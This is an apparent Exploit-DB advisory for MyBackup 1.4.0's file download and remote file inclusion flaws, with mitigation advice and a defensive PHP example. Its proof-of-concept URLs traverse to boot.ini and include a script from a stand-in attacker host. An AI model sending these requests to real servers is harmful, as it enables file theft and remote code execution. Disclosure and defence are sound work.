Vendor: MyBackup
By: SirGod
CVSS: 9.3 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: MyBackup
Affected Version From: 1.4.0
Affected Version To: 1.4.0
Patch Exists: NO
Year: 2009

MyBackup 1.4.0 Remote File Inclusion (AFD/RFI) Multiple Remote Vulnerabilities

MyBackup 1.4.0 is vulnerable to Remote File Inclusion (RFI) and Arbitrary File Download (AFD) attacks. Both are triggered by a crafted URL sent to the application. The filename parameter of down.php accepts directory traversal sequences, so it can be used to download arbitrary files from the server. The main_content parameter of index.php accepts a remote URL, so a logged-in user can use it to execute malicious code on the server.

Mitigation:

To mitigate this vulnerability, the application should validate all user input and filter out any malicious URLs. Additionally, the application should be configured to only allow access to trusted domains.
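
One way to apply the input validation described above, as an added example that is not MyBackup's own code: the filename value of down.php is confined to a single directory, and the main_content value of index.php is mapped through an allow-list instead of being included directly. BACKUP_DIR, PAGES and both function names are assumptions; only the two parameter names come from the advisory.

```php
<?php
// Added example, not MyBackup's code. BACKUP_DIR, PAGES and the function
// names are hypothetical; only the parameter names come from the advisory.
const BACKUP_DIR = __DIR__ . '/backups';
const PAGES = [                 // allow-list: request token => local file
    'home'    => 'pages/home.php',
    'backups' => 'pages/backups.php',
];

// down.php: resolve ?filename= and refuse anything outside BACKUP_DIR.
function resolve_download(string $name): ?string
{
    // Reject empty names and NUL bytes before touching the filesystem.
    if ($name === '' || strpos($name, "\0") !== false) {
        return null;
    }
    $base = realpath(BACKUP_DIR);
    // realpath() collapses ../ segments and symlinks; false if nothing exists.
    $path = realpath(BACKUP_DIR . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // The resolved path must still sit under the backup directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// index.php: map ?main_content= to a fixed local file. The raw request
// value is never passed to include/require, so a URL cannot be loaded.
// Keeping allow_url_include=Off in php.ini is a second layer of defence.
function resolve_page(string $token): string
{
    return PAGES[$token] ?? PAGES['home'];
}

// Constructed sample inputs in the two request shapes the advisory shows.
$samples = [
    'filename'     => '../../../../../../boot.ini',
    'main_content' => 'http://evilsite.com/evilscript.txt',
];
var_dump(resolve_download($samples['filename']));   // traversal is refused
var_dump(resolve_page($samples['main_content']));   // falls back to 'home'
```

A caller in down.php would send a 404 when resolve_download() returns null and stream the file only from the returned path.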

Exploit-DB raw data:

###############################################################################################
[+] MyBackup 1.4.0  Remote File Inclusion (AFD/RFI) Multiple Remote Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
################################################################################################

[+] Download Script : http://www.tufat.com/files_lgpl/script_96.zip

[+] Arbitrary File Download

 - PoC

     http://127.0.0.1/down.php?filename=../../../../../../boot.ini

[+] Remote File Inclusion

 - You must be logged in.

     http://127.0.0.1/index.php?main_tabid=1&main_content=http://evilsite.com/evilscript.txt

################################################################################################

# milw0rm.com [2009-08-05]